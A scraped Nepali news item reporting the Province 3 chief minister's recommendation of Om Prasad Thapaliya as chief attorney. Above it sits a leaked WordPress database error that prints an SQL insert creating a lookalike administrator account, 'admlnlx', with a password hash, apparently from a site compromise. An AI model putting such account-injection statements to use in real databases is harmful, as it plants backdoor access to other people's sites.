WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BGm.fPFyvfi2lbjV2QmqIZBAxmo0iQ0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-07 05:06:15', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, १० साउन, हेटौंडा । प्रदेश ३ को मुख्य न्यायाधिवक्तामा ओमप्रसाद थपलिया को नाम सिफारिस भएको छ ।
मुख्यमन्त्री डोरमणि पौडेलले काठमाडौँ महानगरपालिका–१४ कलंकीका थपलियालाई बुधबार सो पदमा नियुक्तिका लागि सिफारिस गरेका हुन् ।
यसअघि मुख्य न्यायाधिवक्ताको जिम्मेवारीमा रहेका सूर्यचन्द्र न्यौपानेले राजीनामा दिएपछि यो पद रिक्त थियो ।
मुख्य न्यायाधिवक्ताको नियुक्ति प्रदेशका मुख्यमन्त्रीको सिफारिसमा प्रदेश प्रमुखले गर्ने संवैधानिक व्यावस्था छ । बत्तीस वर्षअघि अभिवक्ता बनेर कानूनी क्षेत्रमा लागेका थपलिया ०४८ देखि अधिवक्ताको रुपमा वकालत पेशामा क्रियाशील हुँदै दुई वर्षअघि वरिष्ठ अधिवक्ता बनेका थिए ।
साभार: अनलाईनखबर